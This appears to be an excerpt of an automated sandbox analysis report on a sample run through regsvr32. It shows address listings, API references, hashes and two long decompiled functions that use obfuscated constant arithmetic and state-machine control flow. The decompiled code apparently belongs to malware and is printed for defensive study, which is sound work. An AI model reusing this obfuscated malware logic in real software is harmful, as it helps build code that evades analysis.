                                                                                                                0x10042f3a
                                                                                                                0x10042f40
                                                                                                                0x10042f46
                                                                                                                0x10042f4c
                                                                                                                0x10042f52
                                                                                                                0x10042f58
                                                                                                                0x10042f5f
                                                                                                                0x10042f66
                                                                                                                0x10042f6d
                                                                                                                0x10042f74
                                                                                                                0x10042f7b
                                                                                                                0x10042f82
                                                                                                                0x10042f83
                                                                                                                0x10042f8c
                                                                                                                0x10042f94
                                                                                                                0x10042f9c
                                                                                                                0x10042fa7
                                                                                                                0x10042fb1
                                                                                                                0x10042fb6
                                                                                                                0x10042fbb
                                                                                                                0x10042fc5
                                                                                                                0x10042fcf
                                                                                                                0x10042fd4
                                                                                                                0x10042fda
                                                                                                                0x10042fdf
                                                                                                                0x10042feb
                                                                                                                0x10042ff0
                                                                                                                0x10042ff2
                                                                                                                0x10042ffa
                                                                                                                0x10043005
                                                                                                                0x10043012
                                                                                                                0x10043014
                                                                                                                0x10043016
                                                                                                                0x1004301b
                                                                                                                0x1004302f

                                                                                                                APIs
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 10042FE5
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 10042FFA
                                                                                                                • UnhandledExceptionFilter.KERNEL32(1005E0B0), ref: 10043005
                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 10043021
                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 10043028
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2579439406-0
                                                                                                                • Opcode ID: 8abd97846ce0fdaa6b72251a45df092e791fca62a4a0909e4d71e8bdea95afb0
                                                                                                                • Instruction ID: 4840f814a5ffd126f34e836e92ef276f075f750e7d7c0fa29799507bff115c89
                                                                                                                • Opcode Fuzzy Hash: 8abd97846ce0fdaa6b72251a45df092e791fca62a4a0909e4d71e8bdea95afb0
                                                                                                                • Instruction Fuzzy Hash: 6D2105789102A0CFE310DF69DCC56C43BB6FB08341F50526AE588A76A1E7F859C58F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7098 Relevance: 6.6, Strings: 5, Instructions: 376COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E001B7098(signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				intOrPtr _v164;
				intOrPtr _v196;
				char _v212;
				short _v756;
				short _v758;
				intOrPtr _v760;
				signed int _v804;
				char _v1324;
				char _v1844;
				void* __ecx;
				signed int _t392;
				signed int _t395;
				intOrPtr _t405;
				void* _t407;
				signed int _t413;
				void* _t448;
				signed int _t460;
				signed int _t461;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				void* _t472;
				void* _t473;

				_t405 = _a4;
				_push(_a24);
				_v156 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_t405);
				_push(__edx);
				E001AC98A(__edx);
				_v160 = _v160 & 0x00000000;
				_t473 = _t472 + 0x20;
				_v164 = 0xe9cde5;
				_v152 = 0xe1ae83;
				_t407 = 0x2bd40a0;
				_v152 = _v152 ^ 0xd60f8d8c;
				_v152 = _v152 ^ 0xd6ee231f;
				_v132 = 0xd9c22f;
				_t460 = 0x57;
				_v132 = _v132 * 0x4c;
				_v132 = _v132 ^ 0x40aa69c9;
				_v144 = 0x772f8a;
				_v144 = _v144 / _t460;
				_v144 = _v144 ^ 0x0001f636;
				_v24 = 0x9e03f;
				_t461 = 0x12;
				_v24 = _v24 / _t461;
				_t462 = 0xb;
				_v24 = _v24 / _t462;
				_v24 = _v24 | 0x650e5178;
				_v24 = _v24 ^ 0x650a33e8;
				_v124 = 0x6eb2de;
				_v124 = _v124 + 0xffff1123;
				_v124 = _v124 ^ 0x006ca912;
				_v32 = 0x942ada;
				_v32 = _v32 * 0x62;
				_v32 = _v32 << 1;
				_v32 = _v32 + 0x76c5;
				_v32 = _v32 ^ 0x717f66a2;
				_v56 = 0xd0fbc5;
				_v56 = _v56 * 0x63;
				_v56 = _v56 * 0x78;
				_v56 = _v56 ^ 0xe22d0e94;
				_v80 = 0x21b0a5;
				_v80 = _v80 + 0xffff5f41;
				_v80 = _v80 ^ 0x333fb36a;
				_v80 = _v80 ^ 0x331549a3;
				_v64 = 0x5432d9;
				_v64 = _v64 | 0x7c4df539;
				_v64 = _v64 >> 0xa;
				_v64 = _v64 ^ 0x00189496;
				_v68 = 0xab2afc;
				_v68 = _v68 * 0x3a;
				_v68 = _v68 | 0xc3d15b72;
				_v68 = _v68 ^ 0xe7d66726;
				_v60 = 0xe64bce;
				_v60 = _v60 >> 6;
				_v60 = _v60 + 0xffffe059;
				_v60 = _v60 ^ 0x000014e2;
				_v8 = 0xab89de;
				_v8 = _v8 ^ 0xdadf3d4d;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0xfe0c27c5;
				_v8 = _v8 ^ 0x4aed6090;
				_v92 = 0x4ab211;
				_v92 = _v92 << 2;
				_v92 = _v92 ^ 0x012e05c3;
				_v112 = 0xfa2a6c;
				_t463 = 0x52;
				_v112 = _v112 / _t463;
				_v112 = _v112 ^ 0x0000aa3c;
				_v104 = 0x3b8906;
				_v104 = _v104 ^ 0x968d0d7c;
				_v104 = _v104 ^ 0x96b90388;
				_v96 = 0x3894d1;
				_v96 = _v96 + 0xffff2d0b;
				_v96 = _v96 ^ 0x003fc317;
				_v88 = 0x7cf997;
				_v88 = _v88 + 0xffff8033;
				_v88 = _v88 ^ 0x0070ae74;
				_v48 = 0xd70609;
				_v48 = _v48 << 0xe;
				_v48 = _v48 + 0x2f9a;
				_v48 = _v48 ^ 0x7a85bebd;
				_v48 = _v48 ^ 0xbb0867d7;
				_v16 = 0x934351;
				_v16 = _v16 << 0xa;
				_v16 = _v16 + 0x16ff;
				_v16 = _v16 + 0x3792;
				_v16 = _v16 ^ 0x4d0de3c9;
				_v40 = 0xed9c1a;
				_v40 = _v40 << 5;
				_v40 = _v40 >> 6;
				_v40 = _v40 | 0xb8c33e11;
				_v40 = _v40 ^ 0xb8f7351a;
				_v52 = 0xe93acd;
				_v52 = _v52 << 6;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x00e2edc9;
				_v36 = 0xf21b52;
				_t464 = 0x49;
				_v36 = _v36 * 0x53;
				_v36 = _v36 + 0x1375;
				_v36 = _v36 ^ 0xfc2b51b1;
				_v36 = _v36 ^ 0xb2507db2;
				_v140 = 0x565459;
				_v140 = _v140 * 0x60;
				_v140 = _v140 ^ 0x205fd495;
				_v100 = 0xbc592d;
				_v100 = _v100 ^ 0x2c73af3d;
				_v100 = _v100 ^ 0x2cc7dac8;
				_v28 = 0x20667c;
				_v28 = _v28 + 0xffff8dc2;
				_v28 = _v28 * 0x69;
				_v28 = _v28 / _t464;
				_v28 = _v28 ^ 0x002d4b1e;
				_v116 = 0xf87664;
				_v116 = _v116 >> 4;
				_v116 = _v116 ^ 0x00040105;
				_v148 = 0x862c06;
				_v148 = _v148 * 0x1b;
				_v148 = _v148 ^ 0x0e220f18;
				_v108 = 0x5b01b1;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x02d2fc58;
				_v20 = 0xc0bc00;
				_v20 = _v20 + 0xffff673e;
				_v20 = _v20 ^ 0x9f38b281;
				_v20 = _v20 | 0x7195642b;
				_v20 = _v20 ^ 0xfff305fd;
				_v72 = 0x5a25f7;
				_v72 = _v72 + 0xffff806b;
				_t465 = 9;
				_t459 = _v156;
				_v72 = _v72 * 6;
				_v72 = _v72 ^ 0x02144f11;
				_v44 = 0x5a5457;
				_v44 = _v44 + 0xffff95a6;
				_v44 = _v44 / _t465;
				_t466 = 0x14;
				_v44 = _v44 * 0x53;
				_v44 = _v44 ^ 0x03367d00;
				_v136 = 0xf64c3a;
				_v136 = _v136 / _t466;
				_v136 = _v136 ^ 0x0002671c;
				_v12 = 0x3757cd;
				_t467 = 0x22;
				_v12 = _v12 / _t467;
				_v12 = _v12 + 0xd6dd;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0x0007fcf5;
				_v120 = 0xe25aef;
				_v120 = _v120 << 3;
				_v120 = _v120 ^ 0x071f129a;
				_v84 = 0xe470cc;
				_v84 = _v84 ^ 0x42708a71;
				_t468 = 0x5e;
				_v84 = _v84 / _t468;
				_v84 = _v84 ^ 0x00bf574f;
				_v128 = 0x9e9e4f;
				_t469 = 0x19;
				_v128 = _v128 * 0x57;
				_v128 = _v128 ^ 0x35e08318;
				_v76 = 0xebfafe;
				_v76 = _v76 + 0xffffdc01;
				_v76 = _v76 / _t469;
				_v76 = _v76 ^ 0x000d8556;
				while(1) {
					L1:
					_t448 = 0x2e;
					L2:
					while(_t407 != 0x2bd40a0) {
						if(_t407 == 0x2e0e603) {
							_t392 = E001AEC5D( &_v804, _v12, _v120, _t459);
							asm("sbb ecx, ecx");
							_t413 =  ~_t392 & 0x05acb6ea;
							L17:
							_t407 = _t413 + 0x4e7b3c1;
							while(1) {
								L1:
								_t448 = 0x2e;
								goto L2;
							}
						}
						if(_t407 == 0x4e7b3c1) {
							return E001A6EB4(_v84, _t459, _v128, _v76);
						}
						if(_t407 == 0x8acca3d) {
							_t395 = E001C27C2(_v112,  &_v804,  &_v1844, _v104, _v96);
							_t459 = _t395;
							_t473 = _t473 + 0xc;
							__eflags = _t395 - 0xffffffff;
							if(__eflags == 0) {
								return _t395;
							}
							_t407 = 0xa946aab;
							while(1) {
								L1:
								_t448 = 0x2e;
								goto L2;
							}
						}
						if(_t407 == 0xa338b58) {
							_push(_v124);
							_push(0x1a1000);
							_push(_v24);
							E001C1C9B(_v32, __eflags, _v56, _t405, E001BF5D9(_v132, _v144, __eflags), _v132, _v80, _v64);
							_t395 = E001BF94B(_t396, _v68, _v60, _v8, _v92);
							_t473 = _t473 + 0x30;
							_t407 = 0x8acca3d;
							goto L1;
						}
						if(_t407 != 0xa946aab) {
							L23:
							__eflags = _t407 - 0x341abab;
							if(__eflags != 0) {
								continue;
							}
							return _t395;
						}
						_t395 = _v152;
						if((_v804 & _t395) == 0) {
							_t395 = _a8( &_v804,  &_v212);
							asm("sbb ecx, ecx");
							_t413 =  ~_t395 & 0xfdf93242;
							__eflags = _t413;
							goto L17;
						}
						if(_v760 != _t448 || _v758 != 0 && (_v758 != _t448 || _v756 != 0)) {
							__eflags = _a16;
							if(__eflags != 0) {
								_push(_v40);
								_push(0x1a1040);
								_push(_v16);
								E001B8EB3(_t405, __eflags, _v52, _v88, _v36,  &_v1324, _v140, E001BF5D9(_v88, _v48, __eflags), _v100);
								E001B7098(_v156,  &_v1324, _a8, _v116, _a16, _v148, _v108);
								_t395 = E001BF94B(_t400, _v20, _v72, _v44, _v136);
								_t473 = _t473 + 0x4c;
								_t448 = 0x2e;
							}
						}
						_t407 = 0x2e0e603;
					}
					_v196 = _t405;
					_t407 = 0xa338b58;
					goto L23;
				}
			}






































































                                                                                                                0x001b70a2
                                                                                                                0x001b70a9
                                                                                                                0x001b70ac
                                                                                                                0x001b70b2
                                                                                                                0x001b70b5
                                                                                                                0x001b70b8
                                                                                                                0x001b70bb
                                                                                                                0x001b70be
                                                                                                                0x001b70bf
                                                                                                                0x001b70c1
                                                                                                                0x001b70c6
                                                                                                                0x001b70cd
                                                                                                                0x001b70d0
                                                                                                                0x001b70dc
                                                                                                                0x001b70e6
                                                                                                                0x001b70eb
                                                                                                                0x001b70f5
                                                                                                                0x001b70ff
                                                                                                                0x001b710c
                                                                                                                0x001b710f
                                                                                                                0x001b7112
                                                                                                                0x001b7119
                                                                                                                0x001b712d
                                                                                                                0x001b7133
                                                                                                                0x001b713d
                                                                                                                0x001b7147
                                                                                                                0x001b714c
                                                                                                                0x001b7154
                                                                                                                0x001b7157
                                                                                                                0x001b715a
                                                                                                                0x001b7161
                                                                                                                0x001b7168
                                                                                                                0x001b716f
                                                                                                                0x001b7176
                                                                                                                0x001b717d
                                                                                                                0x001b7188
                                                                                                                0x001b718b
                                                                                                                0x001b718e
                                                                                                                0x001b7195
                                                                                                                0x001b719c
                                                                                                                0x001b71a7
                                                                                                                0x001b71ae
                                                                                                                0x001b71b1
                                                                                                                0x001b71b8
                                                                                                                0x001b71bf
                                                                                                                0x001b71c6
                                                                                                                0x001b71cd
                                                                                                                0x001b71d4
                                                                                                                0x001b71db
                                                                                                                0x001b71e2
                                                                                                                0x001b71e6
                                                                                                                0x001b71ed
                                                                                                                0x001b71f8
                                                                                                                0x001b71fb
                                                                                                                0x001b7202
                                                                                                                0x001b7209
                                                                                                                0x001b7210
                                                                                                                0x001b7214
                                                                                                                0x001b721b
                                                                                                                0x001b7222
                                                                                                                0x001b722b
                                                                                                                0x001b7232
                                                                                                                0x001b7235
                                                                                                                0x001b723c
                                                                                                                0x001b7243
                                                                                                                0x001b724a
                                                                                                                0x001b724e
                                                                                                                0x001b7255
                                                                                                                0x001b7261
                                                                                                                0x001b7266
                                                                                                                0x001b726b
                                                                                                                0x001b7272
                                                                                                                0x001b7279
                                                                                                                0x001b7280
                                                                                                                0x001b7287
                                                                                                                0x001b728e
                                                                                                                0x001b7295
                                                                                                                0x001b729c
                                                                                                                0x001b72a3
                                                                                                                0x001b72aa
                                                                                                                0x001b72b1
                                                                                                                0x001b72b8
                                                                                                                0x001b72bc
                                                                                                                0x001b72c3
                                                                                                                0x001b72ca
                                                                                                                0x001b72d1
                                                                                                                0x001b72d8
                                                                                                                0x001b72dc
                                                                                                                0x001b72e3
                                                                                                                0x001b72ea
                                                                                                                0x001b72f1
                                                                                                                0x001b72f8
                                                                                                                0x001b72fc
                                                                                                                0x001b7300
                                                                                                                0x001b7307
                                                                                                                0x001b730e
                                                                                                                0x001b7315
                                                                                                                0x001b7319
                                                                                                                0x001b731d
                                                                                                                0x001b7324
                                                                                                                0x001b732f
                                                                                                                0x001b7330
                                                                                                                0x001b7333
                                                                                                                0x001b733a
                                                                                                                0x001b7341
                                                                                                                0x001b7348
                                                                                                                0x001b7359
                                                                                                                0x001b735f
                                                                                                                0x001b7369
                                                                                                                0x001b7370
                                                                                                                0x001b7377
                                                                                                                0x001b737e
                                                                                                                0x001b7385
                                                                                                                0x001b7390
                                                                                                                0x001b7398
                                                                                                                0x001b739b
                                                                                                                0x001b73a2
                                                                                                                0x001b73a9
                                                                                                                0x001b73ad
                                                                                                                0x001b73b4
                                                                                                                0x001b73c5
                                                                                                                0x001b73cb
                                                                                                                0x001b73d5
                                                                                                                0x001b73dc
                                                                                                                0x001b73e0
                                                                                                                0x001b73e7
                                                                                                                0x001b73ee
                                                                                                                0x001b73f5
                                                                                                                0x001b73fc
                                                                                                                0x001b7405
                                                                                                                0x001b740c
                                                                                                                0x001b7413
                                                                                                                0x001b7420
                                                                                                                0x001b7423
                                                                                                                0x001b7429
                                                                                                                0x001b742c
                                                                                                                0x001b7433
                                                                                                                0x001b743a
                                                                                                                0x001b7448
                                                                                                                0x001b744f
                                                                                                                0x001b7452
                                                                                                                0x001b7455
                                                                                                                0x001b745c
                                                                                                                0x001b7470
                                                                                                                0x001b7476
                                                                                                                0x001b7480
                                                                                                                0x001b748a
                                                                                                                0x001b748f
                                                                                                                0x001b7494
                                                                                                                0x001b749b
                                                                                                                0x001b749e
                                                                                                                0x001b74a5
                                                                                                                0x001b74ac
                                                                                                                0x001b74b0
                                                                                                                0x001b74b7
                                                                                                                0x001b74be
                                                                                                                0x001b74c8
                                                                                                                0x001b74cd
                                                                                                                0x001b74d2
                                                                                                                0x001b74d9
                                                                                                                0x001b74e4
                                                                                                                0x001b74e5
                                                                                                                0x001b74e8
                                                                                                                0x001b74ef
                                                                                                                0x001b74f6
                                                                                                                0x001b7502
                                                                                                                0x001b7505
                                                                                                                0x001b750c
                                                                                                                0x001b750c
                                                                                                                0x001b750e
                                                                                                                0x00000000
                                                                                                                0x001b750f
                                                                                                                0x001b7521
                                                                                                                0x001b76e6
                                                                                                                0x001b76f1
                                                                                                                0x001b76f3
                                                                                                                0x001b7647
                                                                                                                0x001b7647
                                                                                                                0x001b750c
                                                                                                                0x001b750c
                                                                                                                0x001b750e
                                                                                                                0x00000000
                                                                                                                0x001b750e
                                                                                                                0x001b750c
                                                                                                                0x001b752d
                                                                                                                0x00000000
                                                                                                                0x001b7728
                                                                                                                0x001b7539
                                                                                                                0x001b76c0
                                                                                                                0x001b76c5
                                                                                                                0x001b76c7
                                                                                                                0x001b76ca
                                                                                                                0x001b76cd
                                                                                                                0x001b772f
                                                                                                                0x001b772f
                                                                                                                0x001b76cf
                                                                                                                0x001b750c
                                                                                                                0x001b750c
                                                                                                                0x001b750e
                                                                                                                0x00000000
                                                                                                                0x001b750e
                                                                                                                0x001b750c
                                                                                                                0x001b7545
                                                                                                                0x001b7652
                                                                                                                0x001b7655
                                                                                                                0x001b765a
                                                                                                                0x001b7685
                                                                                                                0x001b7698
                                                                                                                0x001b769d
                                                                                                                0x001b76a0
                                                                                                                0x00000000
                                                                                                                0x001b76a0
                                                                                                                0x001b7551
                                                                                                                0x001b7709
                                                                                                                0x001b7709
                                                                                                                0x001b770f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001b770f
                                                                                                                0x001b7557
                                                                                                                0x001b7563
                                                                                                                0x001b7638
                                                                                                                0x001b763f
                                                                                                                0x001b7641
                                                                                                                0x001b7641
                                                                                                                0x00000000
                                                                                                                0x001b7641
                                                                                                                0x001b7570
                                                                                                                0x001b7599
                                                                                                                0x001b759d
                                                                                                                0x001b759f
                                                                                                                0x001b75a2
                                                                                                                0x001b75a7
                                                                                                                0x001b75da
                                                                                                                0x001b7604
                                                                                                                0x001b761a
                                                                                                                0x001b761f
                                                                                                                0x001b7624
                                                                                                                0x001b7624
                                                                                                                0x001b759d
                                                                                                                0x001b758f
                                                                                                                0x001b758f
                                                                                                                0x001b76fe
                                                                                                                0x001b7704
                                                                                                                0x00000000
                                                                                                                0x001b7704

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: WTZ$YTV$|f $3e$Z
                                                                                                                • API String ID: 0-1675320682
                                                                                                                • Opcode ID: 2da71b13947c65a4c5b28634c232b966d466bff14ba6ba5cab51ae2da56b3518
                                                                                                                • Instruction ID: e5a1f9901b03e53987933ef84d8b1c0fecc09969b06f699c728f2149d3d88380
                                                                                                                • Opcode Fuzzy Hash: 2da71b13947c65a4c5b28634c232b966d466bff14ba6ba5cab51ae2da56b3518
                                                                                                                • Instruction Fuzzy Hash: F0023371D0031DDBDF28CFA5D98AADEBBB1FB44314F208199E119BA2A0D7B45A85CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BA916 Relevance: 6.5, Strings: 5, Instructions: 287COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E001BA916(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				void* _t293;
				intOrPtr _t318;
				void* _t319;
				intOrPtr _t320;
				void* _t321;
				intOrPtr _t330;
				intOrPtr* _t331;
				void* _t333;
				intOrPtr _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t367;
				void* _t368;

				_t331 = _a8;
				_t358 = _a16;
				_push(_a16);
				_push(_a12);
				_push(_t331);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t293);
				_v12 = 0xcfece2;
				_t356 = 0;
				_v8 = 0;
				_t368 = _t367 + 0x18;
				_v72 = 0x10390c;
				_v72 = _v72 + 0xffffc646;
				_t333 = 0x7113fca;
				_v72 = _v72 + 0x8901;
				_v72 = _v72 ^ 0x00108852;
				_v64 = 0xc2569b;
				_t359 = 0x3b;
				_v64 = _v64 * 0x3a;
				_v64 = _v64 ^ 0x2c079f1f;
				_v32 = 0x7d2c68;
				_v32 = _v32 + 0xfffff73c;
				_v32 = _v32 ^ 0x007d23a4;
				_v128 = 0x75b64a;
				_v128 = _v128 / _t359;
				_v128 = _v128 + 0xffffd052;
				_v128 = _v128 | 0x8672ae22;
				_v128 = _v128 ^ 0x8673ef32;
				_v124 = 0xe9f0ba;
				_t360 = 0x29;
				_v124 = _v124 / _t360;
				_v124 = _v124 >> 0xe;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x00000b00;
				_v92 = 0x799909;
				_v92 = _v92 >> 8;
				_v92 = _v92 + 0xffffcd0e;
				_v92 = _v92 ^ 0x000046a7;
				_v56 = 0x8ef074;
				_t361 = 0x71;
				_v56 = _v56 * 0x47;
				_v56 = _v56 ^ 0x27a4b02c;
				_v132 = 0x690018;
				_v132 = _v132 ^ 0x753d7ebe;
				_v132 = _v132 + 0xac3c;
				_v132 = _v132 | 0x0b990209;
				_v132 = _v132 ^ 0x7fd9c8cb;
				_v140 = 0x815f08;
				_v140 = _v140 * 0x73;
				_v140 = _v140 | 0x676ee4e7;
				_t76 =  &_v140; // 0x676ee4e7
				_v140 =  *_t76 / _t361;
				_v140 = _v140 ^ 0x0127f316;
				_v144 = 0x3abc98;
				_v144 = _v144 * 7;
				_v144 = _v144 >> 0xf;
				_v144 = _v144 ^ 0xe81b0f65;
				_v144 = _v144 ^ 0xe812fd25;
				_v40 = 0x319552;
				_v40 = _v40 ^ 0x1d2bd854;
				_v40 = _v40 ^ 0x1d1ded34;
				_v80 = 0x1d17d1;
				_v80 = _v80 + 0xa9fa;
				_v80 = _v80 >> 2;
				_v80 = _v80 ^ 0x000d60f2;
				_v104 = 0x8ceca1;
				_v104 = _v104 << 0xd;
				_v104 = _v104 + 0xffff778a;
				_v104 = _v104 ^ 0x9d9973a6;
				_v96 = 0xea692c;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x3587ac27;
				_v96 = _v96 ^ 0x358266e1;
				_v100 = 0xb26a44;
				_t362 = 0x2e;
				_v100 = _v100 * 0x6d;
				_v100 = _v100 + 0xffff1c29;
				_v100 = _v100 ^ 0x4bfa4831;
				_v48 = 0x656f5f;
				_v48 = _v48 | 0xa8d50bb0;
				_v48 = _v48 ^ 0xa8fe92b3;
				_v68 = 0x9c7f61;
				_v68 = _v68 ^ 0xb53d5df8;
				_v68 = _v68 ^ 0xb5a47821;
				_v60 = 0xbc56d0;
				_v60 = _v60 ^ 0x99871768;
				_v60 = _v60 ^ 0x993c193b;
				_v36 = 0xb45a01;
				_v36 = _v36 ^ 0x32323901;
				_v36 = _v36 ^ 0x32877053;
				_v88 = 0x4d9d62;
				_v88 = _v88 * 0x30;
				_v88 = _v88 << 2;
				_v88 = _v88 ^ 0x3a3f1567;
				_v76 = 0x6bfb6a;
				_v76 = _v76 | 0x9d3e0e52;
				_v76 = _v76 / _t362;
				_v76 = _v76 ^ 0x03682a61;
				_v120 = 0x4854b3;
				_v120 = _v120 >> 8;
				_v120 = _v120 + 0xc569;
				_t363 = 0x41;
				_v120 = _v120 / _t363;
				_v120 = _v120 ^ 0x00002370;
				_v28 = 0x7b8e3c;
				_t364 = 0x78;
				_v28 = _v28 * 0x72;
				_v28 = _v28 ^ 0x37042199;
				_v136 = 0xc7178a;
				_v136 = _v136 / _t364;
				_v136 = _v136 << 8;
				_v136 = _v136 * 0x78;
				_v136 = _v136 ^ 0xc7162ffc;
				_v44 = 0x7b610d;
				_v44 = _v44 | 0xe606a1a1;
				_v44 = _v44 ^ 0xe67b2d1a;
				_v24 = 0xb2222a;
				_v24 = _v24 >> 7;
				_v24 = _v24 ^ 0x000c957f;
				_v84 = 0xc3cee5;
				_v84 = _v84 >> 8;
				_v84 = _v84 + 0xffff729c;
				_v84 = _v84 ^ 0x00073a08;
				_v112 = 0x2abb2b;
				_v112 = _v112 | 0x3033108e;
				_v112 = _v112 + 0x9aa;
				_v112 = _v112 | 0xa5c8e182;
				_v112 = _v112 ^ 0xb5f899f7;
				_v52 = 0x758575;
				_v52 = _v52 | 0x0f0ee750;
				_v52 = _v52 ^ 0x0f7fc0bd;
				_v108 = 0x73f24e;
				_t365 = 0xf;
				_v108 = _v108 / _t365;
				_v108 = _v108 >> 3;
				_v108 = _v108 << 5;
				_v108 = _v108 ^ 0x001f5b01;
				_v116 = 0x1d991;
				_v116 = _v116 * 7;
				_v116 = _v116 | 0xa3120732;
				_v116 = _v116 + 0x80de;
				_v116 = _v116 ^ 0xa31438b7;
				do {
					while(_t333 != 0x62e8839) {
						if(_t333 == 0x6bc9356) {
							_t320 =  *0x1c4208; // 0x0
							_t321 = E001C0908( &_v16, _v76,  *((intOrPtr*)(_t320 + 0x1c)),  *((intOrPtr*)(_t358 + 4)), _v20, _v120, _v64, _t333, _t333, _v92,  *_t358, _v28, _v136, _v44, _v24, _v16, _v84, _v112, _v52);
							_t368 = _t368 + 0x44;
							if(_t321 == _v56) {
								 *_t331 = _v20;
								_t356 = 1;
								 *((intOrPtr*)(_t331 + 4)) = _v16;
							} else {
								_t333 = 0xda644ac;
								continue;
							}
						} else {
							if(_t333 == 0x7113fca) {
								_t333 = 0x62e8839;
								continue;
							} else {
								if(_t333 == 0xda644ac) {
									E001B17D2(_v108, _v116, _v20);
								} else {
									if(_t333 != 0xdadef34) {
										goto L14;
									} else {
										_push(_t333);
										_t330 = E001A303A(_t333, _v16);
										_t368 = _t368 + 0xc;
										_v20 = _t330;
										if(_t330 != 0) {
											_t333 = 0x6bc9356;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t356;
					}
					_t318 =  *0x1c4208; // 0x0
					_t319 = E001C0908( &_v16, _v132,  *((intOrPtr*)(_t318 + 0x1c)),  *((intOrPtr*)(_t358 + 4)), _t356, _v140, _v72, _t333, _t333, _v32,  *_t358, _v144, _v40, _v80, _v104, _v128, _v96, _v100, _v48);
					_t368 = _t368 + 0x44;
					if(_t319 != _v124) {
						_t333 = 0x4a84943;
						goto L14;
					} else {
						_t333 = 0xdadef34;
						continue;
					}
					goto L18;
					L14:
				} while (_t333 != 0x4a84943);
				goto L18;
			}
























































                                                                                                                0x001ba91d
                                                                                                                0x001ba926
                                                                                                                0x001ba92e
                                                                                                                0x001ba92f
                                                                                                                0x001ba936
                                                                                                                0x001ba937
                                                                                                                0x001ba93e
                                                                                                                0x001ba93f
                                                                                                                0x001ba940
                                                                                                                0x001ba945
                                                                                                                0x001ba950
                                                                                                                0x001ba952
                                                                                                                0x001ba959
                                                                                                                0x001ba95c
                                                                                                                0x001ba966
                                                                                                                0x001ba96e
                                                                                                                0x001ba973
                                                                                                                0x001ba97b
                                                                                                                0x001ba983
                                                                                                                0x001ba992
                                                                                                                0x001ba995
                                                                                                                0x001ba999
                                                                                                                0x001ba9a1
                                                                                                                0x001ba9ac
                                                                                                                0x001ba9b7
                                                                                                                0x001ba9c2
                                                                                                                0x001ba9d2
                                                                                                                0x001ba9d6
